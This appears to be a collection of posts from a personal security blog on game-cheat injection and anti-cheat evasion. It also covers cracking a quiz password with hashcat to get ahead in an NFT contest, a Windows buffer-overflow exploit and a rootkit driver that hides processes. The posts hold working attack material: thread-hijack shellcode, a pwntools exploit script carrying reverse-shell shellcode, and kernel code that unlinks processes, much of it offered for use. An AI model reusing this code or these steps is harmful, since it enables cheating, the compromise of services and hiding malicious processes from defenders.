Basic Anti-Cheat Evasion

So it’s been a while since I posted a blog. I was so busy with other things, especially adjusting the schedule with my work and my studies.

This short article I’ll discuss some very basic techniques on evading anti-cheat. Of course, you would still need to adjust the evasion mechanism depending on the anti-cheat you are trying to defeat.

On this blog, we will focus on Internal anti-cheat evasion techniques.

Part 1: The injector

First part of making your “cheat” is creating an executable that would inject your .dll into the process, A.K.A the game.

There are lot of injection mechanisms (copied from cynet). Below is the list but not limited to:

Classic DLL injection 

Classic DLL injection is one of the most popular techniques in use. First, the malicious process injects the path to the malicious DLL in the legitimate process’ address space. The Injector process then invokes the DLL via a remote thread execution. It is a fairly easy method, but with some downsides: 

Reflective DLL injection

Reflective DLL injection, unlike the previous method mentioned above, refers to loading a DLL from memory rather than from disk. Windows does not have a LoadLibrary function that supports this. To achieve the functionality, adversaries must write their own function, omitting some of the things Windows normally does, such as registering the DLL as a loaded module in the process, potentially bypassing DLL load monitoring. 

Thread execution hijacking

Thread Hijacking is an operation in which a malicious shellcode is injected into a legitimate thread. Like Process Hollowing, the thread must be suspended before injection.

PE Injection / Manual Mapping

Like Reflective DLL injection, PE injection does not require the executable to be on the disk. This is the most often used technique seen in the wild. PE injection works by copying its malicious code into an existing open process and causing it to execute. To understand how PE injection works, we must first understand shellcode. 

Shellcode is a sequence of machine code, or executable instructions, that is injected into a computer’s memory with the intent of taking control of a running program.  Most shellcodes are written in assembly language. 

Manual Mapping + Thread execution hijacking = Best Combo

Above all of this, I think the very stealthy technique is the manual mapping with thread hijacking.
This is because when you manual map a DLL into a memory, you wouldn’t need to call DLL related WinAPI as you are emulating the whole process itself. Windows isn’t aware that a DLL has been loaded, therefore it wouldn’t link the DLL to the PEB, and it would not create structs nor thread local storage.
Aside from these, since you would be having thread hijacking to execute the DLL, then you are not creating a new thread, therefore you are safe from anti-cheat that checks for suspicious threads that are spawned. After the DLL sets up all initialization and hooks, it would return the control of the hijacked thread its original state, therefore, like nothing happened.

POC

https://github.com/mlesterdampios/manual_map_dll-imgui-d3d11/blob/main/injector/injection.cpp

This repository demonstrate a very simple injector. The following are the steps to achieve the DLL injection:

  • Elevate injector’s process to allow to get handle with PROCESS_ALL_ACCESS permission
  • VirtualAllocEx the dll image to the memory
  • Resolve Imports
  • Resolve Relocations
  • Initialize Cookie
  • VirtualAllocEx the shellcode
  • Fix the shellcode accordingly
  • Stop the thread and adjust it’s RIP pointing to the EntryPoint
  • Resume the thread

The shellcode

byte thread_hijack_shell[] = {
	0x51, // push rcx
	0x50, // push rax
	0x52, // push rdx
	0x48, 0x83, 0xEC, 0x20, // sub rsp, 0x20
	0x48, 0xB9, // movabs rcx, ->
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x48, 0xBA, // movabs rdx, ->
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x48, 0xB8, // movabs rax, ->
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0xFF, 0xD0, // call rax
	0x48, 0xBA, // movabs rdx, ->
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x48, 0x89, 0x54, 0x24, 0x18, // mov qword ptr [rsp + 0x18], rdx
	0x48, 0x83, 0xC4, 0x20, // add rsp, 0x20
	0x5A, // pop rdx
	0x58, // pop rax
	0x59, // pop rcx
	0xFF, 0x64, 0x24, 0xE0 // jmp qword ptr [rsp - 0x20]
};

The line 7 is where you put the image base address, the line 9 is for dwReason, the line 11 is for DLL’s entrypoint and the line 14 is for the original thread RIP that it would jump back after finishing the DLL’s execution.

This injection mechanism is prone to lot of crashes. Approximately around 1 out of 5 injection succeeds. You need to load the game until on the lobby screen, then open the injector, if it crashes, just reboot the game and repeat the process until successful injection.

Part 2: The DLL

Of course, in the dll itself, you still need to do some cleanups. The injection part is done but the “main event of the evening” is just getting started.

POC

https://github.com/mlesterdampios/manual_map_dll-imgui-d3d11/blob/main/example_dll/dllmain.cpp

In the DLL main, we can see cleanups.

UnlinkModuleFromPEB

This one is unlinking the DLL from PEB. But since we are doing Manual Map, it wouldn’t have an effect at all, because windows didn’t even know that a DLL is loaded at all. This is useful tho, if we injected the DLL using classic injection method.

FakePeHeader

This one is replacing the PE header of DLL with a fakeone. Most memory scanner, tries to find suspicious memory location by checking if a PE exists. An MS-DOS header begins with the magic code 0x5A4D, so if an opcodes begin with that magic bytes, chances are, a PE is occupying that space. After that, the memory scanner might read that header for more information on what is really loaded with that memory location.

No Thread Creation

THIS IS IMPORTANT! Since we are hooking the IDXGISwapChain::Present, then we don’t see any reason to keep another thread running, so after our DLL finishes the setup, we then return the control of the thread to its original state. We can use the PresentHook to continue our “dirty business” inside the programs memory. Besides, as mentioned earlier, having threads can lead to anti-cheat flagging.

Obfuscation thru Polymorphism and Instantiation

This technique is already discussed on another blog: Obfuscation thru Polymorphism and Instantiation.

CALLBACKS_INSTANCE = new CALLBACKS();
MAINMENU_INSTANCE = new MAINMENU();

XORSTR

Ah, yes, the XORSTR. We can use this to hide the real string and will only be calculated upon usage.
To demonstrate the XORSTR, here is a sample usage. Focus on the line with “##overlay” string.

xorstr

And this is what it looks like after compiling and putting it under decompiler.

IDA Decompile

Other methodologies

There are some few more basic methodologies that wasn’t applied in the project. Below are following but not limited to:

  • Anti-debugging
  • Anti-VM
  • Polymorphism and Code mutation (to avoid heuristic patten scanners)
  • Syscall hooks
  • Hypervisor-assisted hooking
  • Scatter Manual Mapper (https://github.com/btbd/smap)
  • and etc…

This blog is not meant to teach reversing a game, but if you would like to deep dive more on reverse engineering, checkout: https://www.unknowncheats.me/ and https://guidedhacking.com/

Other resources:

POC and Conclusion

So, with the basic knowledge we have here, we tried to inject this on one of a common game that is still on ring3 (because ring0 AC’s are much more harder to defeat 😭).

BEWARE THAT THE ABOVE SCREENSHOTS ARE ONLY DONE IN A NON-COMPETITIVE MODE, AND ONLY STANDS FOR EDUCATIONAL PURPOSES ONLY. I AM NOT RESPONSIBLE FOR ANY ACTION YOU MAKE WITH THE KNOWLEDGE THAT I SHARED WITH YOU.

And now, we reached the end of this blog, but before I finished this article, I want to say thank you for reading this entire blog, also, I just want to say that I also passed the CISSP last October 2023, but wasn’t able to update here due to lot of workloads.

Again, I am really grateful for your time. Until next time!

Why so trusting?

Quick Context: Okay, so recently, we come across some fancy NFT project wherein “Students” are invited to join “Quizzes” and “Projects” to “Graduate”.

A “Graduate” means whitelisted for the mint of the NFT collection.

Our Goal

Our goal is to get into the top leaderboard so we can ensure our whitelist slot. And we want this by all means, so we use our hacker instinct to get advantage on the quiz.

However, we wouldn’t wanna overkill the contest. We didn’t spawn bots to automatically answer the quizzes (which is easy to do), so we just sticked with our bare hands, manually answering the quizzes. And we just stick to one-to-one account to human. We don’t want to disrupt the experience of other people.

The quiz

The quiz is a client sided web app. Meaning, all of the password for the quiz and questions are given to client without levels of authorization. Below are the steps of our reconnaissance and enumeration to extract the password and the set of question for a quiz.

Cracking the Password

Every quiz has different password. And our goal is to crack the password before the quiz starts (hours before the quiz so we have the chance to crack it).

Upon logging-in and browsing to /quiz page, we could see a web api requests. We can see that a request has a response that includes juicy information. We saw a json response that includes quiz details and we write down the _id and the password to our notes.

$2a$10$msFPZnG.NKHaCcVupGsQyuvpB8IwtZ7v3UxPBwf3fXe8hGdCMEwsu

The password is a bcrypt hash.

The first thing we did was to list all possible passwords and try to compare them against the hash.
But sadly, we didn’t got any “possible password” correct.

What is Bcrypt?

The input to the bcrypt function is the password string (up to 72 bytes), a numeric cost, and a 16-byte (128-bit) salt value. The salt is typically a random value. The bcrypt function uses these inputs to compute a 24-byte (192-bit) hash. The final output of the bcrypt function is a string of the form:

$2<a/b/x/y>$[cost]$[22 character salt][31 character hash]

For example, with input password abc123xyz, cost 12, and a random salt, the output of bcrypt is the string

$2a$12$R9h/cIPz0gi.URNNX3kh2OPST9/PgBkqquzi.Ss7KIUgO2t0jWMUW
\__/\/ \____________________/\_____________________________/
Alg Cost      Salt                        Hash

Where:

  • $2a$: The hash algorithm identifier (bcrypt)
  • 12: Input cost (212 i.e. 4096 rounds)
  • R9h/cIPz0gi.URNNX3kh2O: A base-64 encoding of the input salt
  • PST9/PgBkqquzi.Ss7KIUgO2t0jWMUW: A base-64 encoding of the first 23 bytes of the computed 24 byte hash

The base-64 encoding in bcrypt uses the table ./ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789,[9] which is different than RFC 4648 Base64 encoding.

Back to our discussion

So now we know the basics of bcrypt, we could now start attacking the password hash.

Well, luckily, we got a tool named hashcat.
Without having any more ideas about the password, we can now use the bruteforce technique.
We also know that the password only contains numbers.
So we could go bruteforce increment from ZERO until 10^n. Where n is the number of digits.

hashcat.exe -a 3 -m 3200 --increment --increment-min 1 --increment-max 8 $2a$10$msFPZnG.NKHaCcVupGsQyuvpB8IwtZ7v3UxPBwf3fXe8hGdCMEwsu ?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d

Here, we tell hashcat that our attack mode is Brute-force (-a 3), increment each password iteration (–increment), start from 1 digit (–increment-min 1), end the iteration with maximum of 8 digit (–increment-max 8), password hash that we found earlier ($2a$10$msFPZnG.NKHaCcVupGsQyuvpB8IwtZ7v3UxPBwf3fXe8hGdCMEwsu) and the pattern that we want our hashcat to follow (?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d).

To know more about hashcat, check this out: https://hashcat.net/wiki/doku.php?id=hashcat

And after some couple of minutes, we cracked the hash!

It took only 8 minutes for my GTX1050 to crack a 5-digit password. But it would definitely lasts more longer if the password was longer than 5-digit.
Luckily, the password for this quiz is shorter than the first set of quizzes so we are able to bruteforce this in a very small amount of time.

Extracting Questions

We found a page where we can browse the quiz. We just enter the password that we found for this quiz.

The web app then make a request to the web api and we could see a juicy information here that includes the quiz questionnaires (testData).

We just parse the testData. And boom! Successfully extracted the PASSWORD and the QUESTIONS.

Conclusion

I understand the intention of the developer that they don’t want the participants kinda “DDoS” their servers by having a lot of authentication and authorization though their servers. They just give all their password and quiz data to the client because they want the validation to be on client’s side and not having loads to their server.

The web app’s architecture, does not really abide the Zero Trust Security because they just make the client’s authorized themselves and “trusts” them without proper validation.

Thanks for reading this short writeup!
I hope you enjoy and see you on my next writeup!

Hijack service via buffer overflow (Windows)

Often times, when we are doing penetration tests, we can encounter some applications that is vulnerable to buffer overflow attack.

What Is a Buffer Overflow Attack? (Excerpt from Fortinet)

A buffer overflow attack takes place when an attacker manipulates the coding error to carry out malicious actions and compromise the affected system. The attacker alters the application’s execution path and overwrites elements of its memory, which amends the program’s execution path to damage existing files or expose data.

A buffer overflow attack typically involves violating programming languages and overwriting the bounds of the buffers they exist on. Most buffer overflows are caused by the combination of manipulating memory and mistaken assumptions around the composition or size of data.

A buffer overflow vulnerability will typically occur when code:

  1. Is reliant on external data to control its behavior
  2. Is dependent on data properties that are enforced beyond its immediate scope
  3. Is so complex that programmers are not able to predict its behavior accurately

To read more: https://www.fortinet.com/resources/cyberglossary/buffer-overflow

Demonstration

Pre-requisites and briefing

We found an interesting service (server.exe is made by HTB, no copyright infringement) running as high privilege. We are currently at a low privilege user, finding a way to escalate our privilege and that service might be our ticket to gain high privilege.

We found out that the service is binding to port 4444.
We exfiltrate the service binary so we can do further analysis.
And it turns out we can extract the username and password of it.
But after logging in, nothing interesting happens.

server.exe – port 4444
$ strings server.exe

Output:
...
Dante Server 1.0
Enter Access Name: 
Admin
Access Password: 
Wrong username!
P@$$worD
Correct Password!
Wrong password!
...
Password found but nothing interesting follows

Further investigation, we found out that the DEP on the target machine was turned off.
We also check the binary for dynamic base / ASLR / relocations and such.
Seems like the binary is simply static therefore the base doesn’t change.

We then proceed to replicate the environment to our lab and do our analysis.

Additional checks

Finding the payload offset

We need to determine the correct padding before the EIP is replaced.
If we can control the EIP, then we can control the execution flow of the program and we can hijack it.

Generate a payload

Send this payload on password field. And we need to check the debugger for exceptions that this payload will create.

payload sent
EIP at 33694232
offset at 1028
from pwn import *  
import sys  
  
if len(sys.argv) < 3:  
        print("Usage: {} ip port".format(sys.argv[0]))  
        sys.exit()  
  
ip = sys.argv[1]  
port = sys.argv[2]  
  
payload = "A" * 1028 + "B" * 4 + "C" * 500  
  
r = remote(ip, port)  
r.recvuntil(':')  
r.sendline("Admin")  
r.recvuntil(':')  
r.sendline(payload)

We can try to run this code so we can check if we got our offsets right.

offsets are just in place!

So we can now take control of EIP and hijack the execution flow.
Since we also control the ESP, we can find an instruction that can make the execution to jump to ESP.

jmp esp

We can use https://defuse.ca/online-x86-assembler.htm to assemble and disassemble opcodes

FF E4

We could use the first result at 0x10476D73

0x10476D73

Generating the reverse shell payload

msfvenom reverse shell

We add the payload to our script.
Here is the updated script:

from pwn import *  
import sys  
  
if len(sys.argv) < 3:  
        print("Usage: {} ip port".format(sys.argv[0]))  
        sys.exit()  
  
ip = sys.argv[1]  
port = sys.argv[2]  


#padding before the EIP Replace
buf =  b"A" * 1028

#jmp esp // 0x10476D73
buf += b"\x73\x6d\x47\x10"

#just a NOP buffer before the actual payload
buf += b"\x90" * 10

#this is where esp is pointed, so the instruction will jump here
buf += b""
buf += b"\xb8\xc6\xe1\x27\x01\xdb\xdd\xd9\x74\x24\xf4\x5e"
buf += b"\x2b\xc9\xb1\x52\x31\x46\x12\x83\xee\xfc\x03\x80"
buf += b"\xef\xc5\xf4\xf0\x18\x8b\xf7\x08\xd9\xec\x7e\xed"
buf += b"\xe8\x2c\xe4\x66\x5a\x9d\x6e\x2a\x57\x56\x22\xde"
buf += b"\xec\x1a\xeb\xd1\x45\x90\xcd\xdc\x56\x89\x2e\x7f"
buf += b"\xd5\xd0\x62\x5f\xe4\x1a\x77\x9e\x21\x46\x7a\xf2"
buf += b"\xfa\x0c\x29\xe2\x8f\x59\xf2\x89\xdc\x4c\x72\x6e"
buf += b"\x94\x6f\x53\x21\xae\x29\x73\xc0\x63\x42\x3a\xda"
buf += b"\x60\x6f\xf4\x51\x52\x1b\x07\xb3\xaa\xe4\xa4\xfa"
buf += b"\x02\x17\xb4\x3b\xa4\xc8\xc3\x35\xd6\x75\xd4\x82"
buf += b"\xa4\xa1\x51\x10\x0e\x21\xc1\xfc\xae\xe6\x94\x77"
buf += b"\xbc\x43\xd2\xdf\xa1\x52\x37\x54\xdd\xdf\xb6\xba"
buf += b"\x57\x9b\x9c\x1e\x33\x7f\xbc\x07\x99\x2e\xc1\x57"
buf += b"\x42\x8e\x67\x1c\x6f\xdb\x15\x7f\xf8\x28\x14\x7f"
buf += b"\xf8\x26\x2f\x0c\xca\xe9\x9b\x9a\x66\x61\x02\x5d"
buf += b"\x88\x58\xf2\xf1\x77\x63\x03\xd8\xb3\x37\x53\x72"
buf += b"\x15\x38\x38\x82\x9a\xed\xef\xd2\x34\x5e\x50\x82"
buf += b"\xf4\x0e\x38\xc8\xfa\x71\x58\xf3\xd0\x19\xf3\x0e"
buf += b"\xb3\x5a\x04\x10\x42\xcd\x06\x10\x55\x52\x8e\xf6"
buf += b"\x3f\x7c\xc6\xa1\xd7\xe5\x43\x39\x49\xe9\x59\x44"
buf += b"\x49\x61\x6e\xb9\x04\x82\x1b\xa9\xf1\x62\x56\x93"
buf += b"\x54\x7c\x4c\xbb\x3b\xef\x0b\x3b\x35\x0c\x84\x6c"
buf += b"\x12\xe2\xdd\xf8\x8e\x5d\x74\x1e\x53\x3b\xbf\x9a"
buf += b"\x88\xf8\x3e\x23\x5c\x44\x65\x33\x98\x45\x21\x67"
buf += b"\x74\x10\xff\xd1\x32\xca\xb1\x8b\xec\xa1\x1b\x5b"
buf += b"\x68\x8a\x9b\x1d\x75\xc7\x6d\xc1\xc4\xbe\x2b\xfe"
buf += b"\xe9\x56\xbc\x87\x17\xc7\x43\x52\x9c\xf7\x09\xfe"
buf += b"\xb5\x9f\xd7\x6b\x84\xfd\xe7\x46\xcb\xfb\x6b\x62"
buf += b"\xb4\xff\x74\x07\xb1\x44\x33\xf4\xcb\xd5\xd6\xfa"
buf += b"\x78\xd5\xf2"
  
payload = buf
  
r = remote(ip, port)  
r.recvuntil(':')  
r.sendline("Admin")  
r.recvuntil(':')  
r.sendline(payload)

We then need to start our reverse shell listener

And execute the payload!

payload sent!
HIJACKED

Conclusion and Outro

To summarize what we did, here are the steps:

  1. We find the correct padding for our payload to replace the EIP with our desired address
  2. Since we can replace the EIP, we can hijack the execution flow.
  3. We also have control over the ESP, therefore we can command the EIP to jump to ESP
  4. We generate our reverse shell via msfvenom and add it to our payload
  5. HIJACKED!

Okay, its been quite a while before I was able to publish new content.
I was so busy with OSCP, and the thing is, I did my exam.
… and I failed! LOL.
Well, I thought I was ready, but it seems like I still need more practice.
I will be taking 2nd attempt soon. But for now, ill practice more and more.

That’s it! thanks for reading!

Obfuscation thru Polymorphism and Instantiation

The goal of this writeup is to create an additional layer of defense versus analysis.
A lot of malwares utilize this technique in order for the binary analysis make more harder.

Polymorphism is an important concept of object-oriented programming. It simply means more than one form. That is, the same entity (function or operator) behaves differently in different scenarios

www.programiz.com

We can implement polymorphism in C++ using the following ways:

  1. Function overloading
  2. Operator overloading
  3. Function overriding
  4. Virtual functions

Now, let’s get it working. For this article, we are using a basic class named HEAVENSGATE_BASE and HEAVENSGATE.

Fig1: Instantiation

Then we will be calling a function on an Instantiated Object.

Fig2: Call to a function

Normal Declarations

Fig3: We have a pointer named HEAVENSGATE_INSTANCE.

When we examine the function call (Fig2) under IDA, we get the result of:

Fig4: Direct Call to HEAVENSGATE::InitHeavensGate

and when we cross-reference the functions, we will see on screen:

Fig5: xref HEAVENSGATE::InitHeavensGate

The xref on the .rdata is a call from VirtualTable of the Instantiated object. And the xref on the InitThread is a call to the function (Fig2).

Basic Obfuscation

So, how do we apply basic obfuscation?

We just need to change the declaration of Object to be the “_BASE” level.

Fig6: A pointer named HEAVENSGATE_INSTANCE pointer to HEAVENSGATE_BASE

Unlike earlier, the pointer points to a class named HEAVENSGATE. But this time we will be using the “_BASE”.

Under the IDA, we can see the following instructions:

Fig7: Obfuscated call

Well, technically, it isn’t obfuscated. But the thing is, when an analyzer doesn’t have the .pdb file which contains the symbols name, then it will be harder to follow the calls and purpose of a certain call without using debugger.

This disassembly shows exactly what is going on under the hood with relation to polymorphism. For the invocations of function, the compiler moves the address of the object in to the EDX register. This is then dereferenced to get the base of the VMT and stored in the EAX register. The appropriate VMT entry for the function is found by using EAX as an index and storing the address in EDX. This function is then called. Since HEAVENSGATE_BASE and HEAVENSGATE have different VMTs, this code will call different functions — the appropriate ones — for the appropriate object type. Seeing how it’s done under the hood also allows us to easily write a function to print the VMT.

Fig8: Direct function call is now gone

We can now just see that the direct call (in comparison with Fig5) is now gone. Traces and footprints will be harder to be traced.

Conclusion

Dividing the classes into two: a Base and the Original class, is a time consuming task. It also make the code looks ugly. But somehow, it can greatly add protection to our binary from analysis.

Win11 22H2: Heaven’s Gate Hook

This won’t get too long. Just a quick fix for heavens gate hook (https://mark.rxmsolutions.com/through-the-heavens-gate/) as Microsoft updates the wow64cpu.dll that manages the translation from 32bit to 64bit syscalls of WoW64 applications.

To better visualize the change, here is the comparison of before and after.

Prior to 22h2, down until win10.
win11 22h2

With that being said, you cannot place a hook on 0x3010 as it would take a size of 8 bytes replacement. And would destroy the call mechanism even if you fix the displacement of call.

The solution

The solution is pretty simple. As in very very simple. Copy all the bytes from 0x3010 down until 0x302D. Fix the displacement only for the copied jmp at 0x3028. Then place the hook at 0x3010.
Basically, the copied gate (via VirtualAlloc or Codecave) will continue execution from original 0x3010. And so, the original 0x3015 and onwards will not be executed ever again.

Pretty easy right?

Notes

In the past, Microsoft tends to use far jump to set the CS:33. CS:33 signify that the execution will be a long 64 bit mode in order to translate from 32bit to 64bit. Now, they managed to create bridge without the need for far jmp. Lot of readings need to be cited in order to understand these new mechanism but please do let me know!

Conquering Userland (1/3): DKOM Rootkit

I am now close at finishing the HTB Junior Pentester role course but decided to take a quick brake and focus on one of my favorite fields: reversing games and evading anti-cheat.

The goal

The end goal is simple, to bypass the Cheat Engine for usermode anti-cheats and allow us to debug a game using type-1 hypervisor.

This writeup will be divided into 3 parts.

  • First will be the concept of Direct Kernel Object Manipulation to make a process unlink from eprocess struct.
  • Second, the concept of hypervisor for debugging.
  • And lastly, is the concept of Patchguard, Driver Signature Enforcement and how to disable those.

So without further ado, let’s get our hands dirty!

Difference Between Kernel mode and User mode

https://mark.rxmsolutions.com/wp-content/uploads/2023/09/Difference-Between-User-Mode-and-Kernel-Mode-fig-1.png
Kernel-mode vs User modeIn kernel mode, the program has direct and unrestricted access to system resources.In user mode, the application program executes and starts.
InterruptionsIn Kernel mode, the whole operating system might go down if an interrupt occursIn user mode, a single process fails if an interrupt occurs.  
ModesKernel mode is also known as the master mode, privileged mode, or system mode.User mode is also known as the unprivileged mode, restricted mode, or slave mode.
Virtual address spaceIn kernel mode, all processes share a single virtual address space.In user mode, all processes get separate virtual address space.
Level of privilegeIn kernel mode, the applications have more privileges as compared to user mode.While in user mode the applications have fewer privileges.
RestrictionsAs kernel mode can access both the user programs as well as the kernel programs there are no restrictions.While user mode needs to access kernel programs as it cannot directly access them.
Mode bit valueThe mode bit of kernel-mode is 0.While; the mode bit of user-mode is 3.
Memory ReferencesIt is capable of referencing both memory areas.It can only make references to memory allocated for user mode. 
System CrashA system crash in kernel mode is severe and makes things more complicated.
 
In user mode, a system crash can be recovered by simply resuming the session.
AccessOnly essential functionality is permitted to operate in this mode.User programs can access and execute in this mode for a given system.
FunctionalityThe kernel mode can refer to any memory block in the system and can also direct the CPU for the execution of an instruction, making it a very potent and significant mode.The user mode is a standard and typical viewing mode, which implies that information cannot be executed on its own or reference any memory block; it needs an Application Protocol Interface (API) to achieve these things.
https://www.geeksforgeeks.org/difference-between-user-mode-and-kernel-mode/

Basically, if the anti-cheat resides only in usermode, then the anti-cheat doesn’t have the total control of the system. If you manage to get into the kernelmode, then you can easily manipulate all objects and events in the usermode. However, it is not advised to do the whole cheat in the kernel alone. One single mistake can cause Blue Screen Of Death, but we do need the kernel to allow us for easy read and write on processes.

EPROCESS

The EPROCESS structure is an opaque structure that serves as the process object for a process.

Some routines, such as PsGetProcessCreateTimeQuadPart, use EPROCESS to identify the process to operate on. Drivers can use the PsGetCurrentProcess routine to obtain a pointer to the process object for the current process and can use the ObReferenceObjectByHandle routine to obtain a pointer to the process object that is associated with the specified handle. The PsInitialSystemProcess global variable points to the process object for the system process.

Note that a process object is an Object Manager object. Drivers should use Object Manager routines such as ObReferenceObject and ObDereferenceObject to maintain the object’s reference count.

https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/eprocess

Interestingly, the EPROCESS contains an important handle that can enumerate the running process.
This is where the magic comes in.

typedef struct _EPROCESS
{
     KPROCESS Pcb;
     EX_PUSH_LOCK ProcessLock;
     LARGE_INTEGER CreateTime;
     LARGE_INTEGER ExitTime;
     EX_RUNDOWN_REF RundownProtect;
     PVOID UniqueProcessId;
     LIST_ENTRY ActiveProcessLinks;
     ULONG QuotaUsage[3];
     ULONG QuotaPeak[3];
     ULONG CommitCharge;
     ULONG PeakVirtualSize;
     ULONG VirtualSize;
     LIST_ENTRY SessionProcessLinks;
     PVOID DebugPort;
     union
     {
          PVOID ExceptionPortData;
          ULONG ExceptionPortValue;
          ULONG ExceptionPortState: 3;
     };
     PHANDLE_TABLE ObjectTable;
     EX_FAST_REF Token;
     ULONG WorkingSetPage;
     EX_PUSH_LOCK AddressCreationLock;
...
https://mark.rxmsolutions.com/wp-content/uploads/2023/09/0cb07-capture.jpg

Each list element in LIST_ENTRY is linked towards the next application pointer (flink) and also backwards (blink) which then from a circular list pattern. Each application opened is added to the list, and removed also when closed.

Now here comes the juicy part!

Unlinking the process

Basically, removing the pointer of an application in the ActiveProcessLinks, means the application will now be invisible from other process enumeration. But don’t get me wrong. This is still detectable especially when an anti-cheat have kernel driver because they can easily scan for unlinked patterns and/or perform memory pattern scanning.

A lot of rootkits use this method to hide their process.

adios

Visualization

Before / Original State
After Modification

Checkout this link for image credits and for also a different perspective of the attack.

Kernel Driver

NTSTATUS processHiderDeviceControl(PDEVICE_OBJECT, PIRP irp) {
	auto stack = IoGetCurrentIrpStackLocation(irp);
	auto status = STATUS_SUCCESS;

	switch (stack->Parameters.DeviceIoControl.IoControlCode) {
	case IOCTL_PROCESS_HIDE_BY_PID:
	{
		const auto size = stack->Parameters.DeviceIoControl.InputBufferLength;
		if (size != sizeof(HANDLE)) {
			status = STATUS_INVALID_BUFFER_SIZE;
		}
		const auto pid = *reinterpret_cast<HANDLE*>(stack->Parameters.DeviceIoControl.Type3InputBuffer);
		PEPROCESS eprocessAddress = nullptr;
		status = PsLookupProcessByProcessId(pid, &eprocessAddress);
		if (!NT_SUCCESS(status)) {
			KdPrint(("Failed to look for process by id (0x%08X)\n", status));
			break;
		}

Here, we can see that we are finding the eprocessAddress by using PsLookupProcessByProcessId.
We will also get the offset by finding the pid in the struct. We know that ActiveProcessLinks is just below the UniqueProcessId. This might not be the best possible way because it may break on the future patches when a new element is inserted below UniqueProcessId.

Here is a table of offsets used by different windows versions if you want to use manual offsets rather than the method above.

Win7Sp00x188
Win7Sp10x188
Win8p10x2e8
Win10v16070x2f0
Win10v17030x2e8
Win10v17090x2e8
Win10v18030x2e8
Win10v18090x2e8
Win10v19030x2f0
Win10v19090x2f0
Win10v20040x448
Win10v20H10x448
Win10v20090x448
Win10v20H20x448
Win10v21H10x448
Win10v21H20x448
ActiveProcessLinks offsets
		auto addr = reinterpret_cast<HANDLE*>(eprocessAddress);
		LIST_ENTRY* activeProcessList = 0;
		for (SIZE_T offset = 0; offset < consts::MAX_EPROCESS_SIZE / sizeof(SIZE_T*); offset++) {
			if (addr[offset] == pid) {
				activeProcessList = reinterpret_cast<LIST_ENTRY*>(addr + offset + 1);
				break;
			}
		}

		if (!activeProcessList) {
			ObDereferenceObject(eprocessAddress);
			status = STATUS_UNSUCCESSFUL;
			break;
		}

		KdPrint(("Found address for ActiveProcessList! (0x%08X)\n", activeProcessList));

		if (activeProcessList->Flink == activeProcessList && activeProcessList->Blink == activeProcessList) {
			ObDereferenceObject(eprocessAddress);
			status = STATUS_ALREADY_COMPLETE;
			break;
		}

		LIST_ENTRY* prevProcess = activeProcessList->Blink;
		LIST_ENTRY* nextProcess = activeProcessList->Flink;

		prevProcess->Flink = nextProcess;
		nextProcess->Blink = prevProcess;

We also want the process-to-be-hidden to link on its own because the pointer might not exists anymore if the linked process dies.

		activeProcessList->Blink = activeProcessList;
		activeProcessList->Flink = activeProcessList;

		ObDereferenceObject(eprocessAddress);
	}
		break;
	default:
		status = STATUS_INVALID_DEVICE_REQUEST;
		break;
	}

	irp->IoStatus.Status = status;
	irp->IoStatus.Information = 0;
	IoCompleteRequest(irp, IO_NO_INCREMENT);
	return status;
}

POC

Before
After

Warnings

There are 2 problems that you need to solve first before being able to do this method.

First: You need to disable Driver Signature Enforcement

You need to load your driver to be able to execute kernel functions. You either buy a certificate to sign your own driver so you do not need to disable DSE or you can just disable DSE from windows itself. The only problem of disabling DSE is that some games requires you to have enabled DSE before playing.

Second: Bypass Patchguard

Manually messing with DKOM will result you to BSOD. They got a tons of checks. But luckily we have some ways to bypass patchguard.

These 2 will be tackled on the 3rd part of the writeup. Stay tuned!

HTB: Bug Bounty Hunter

I just got finished the Bug Bounty Hunter Job Role path from HTB. At this point, I am eligible to take HTB Certified Bug Bounty Hunter (HTB CBBH) certification. But I feel that I am still not very much confident to take it. The exam cost $210 as of this writing and allow 2 attempts. The exam runs for 7 days without proctor and it is an open note and only the sky is the limit. Check this out for more info: https://academy.hackthebox.com/preview/certifications/htb-certified-bug-bounty-hunter/

Interestingly, HTB did release a new certification called HTB Certified Penetration Testing Specialist (HTB CPTS) and this is for completing the Junior Penetration Tester Job Role path.

I am thinking to complete the said path first then take HTB CPTS before going directly with OSCP as people rate that HTB is much more harder than OSCP.

Ironically, OSCP is more considered on industry and have a much higher employment value. Who knows? HTB is actually getting ramped up for competing with OSCP and other similar certifications.

My CCNA will be expired next year, so I have to take a higher certificate to automatically renew it. My target will be CCNP Security.

With that being said, here are my certifications that I’ve been dreaming a lot:

Anyway! I feel like I am at 25% of my road to OSCP. Still a lot of work to do, but I won’t stop!

That’s it for my short update! ❤️

Walking through VEH handlers list

This writeup is just a PoC on getting the handlers list in win10.
This PoC was done in Win10 build 19041.

VEH is used to catch exceptions happening in the application, when the exceptions are caught, you have a chance to resolve the exceptions to avoid application crash.

Credits

Almost this whole writeup is written by Dimitri Fourny and not my original writeup but some parts of it are modified as per my Win10 build version. Please kindly visit his blog to see the original writeup.

VEH usage example

LONG NTAPI MyVEHHandler(PEXCEPTION_POINTERS ExceptionInfo) {
  printf("MyVEHHandler (0x%x)\n", ExceptionInfo->ExceptionRecord->ExceptionCode);

  if (ExceptionInfo->ExceptionRecord->ExceptionCode == EXCEPTION_INT_DIVIDE_BY_ZERO) {
    printf("  Divide by zero at 0x%p\n", ExceptionInfo->ExceptionRecord->ExceptionAddress);
    ExceptionInfo->ContextRecord->Eip += 2;
    return EXCEPTION_CONTINUE_EXECUTION;
  }

  return EXCEPTION_CONTINUE_SEARCH;
}

int main() {
  AddVectoredExceptionHandler(1, MyVEHHandler);
  int except = 5;
  except /= 0;
  return 0;
}

There are also applications that uses this method to other matters, such as Cheat Engine to bypass basic debugger checks.

Cheat Engine VEH Debugger

Exception Path

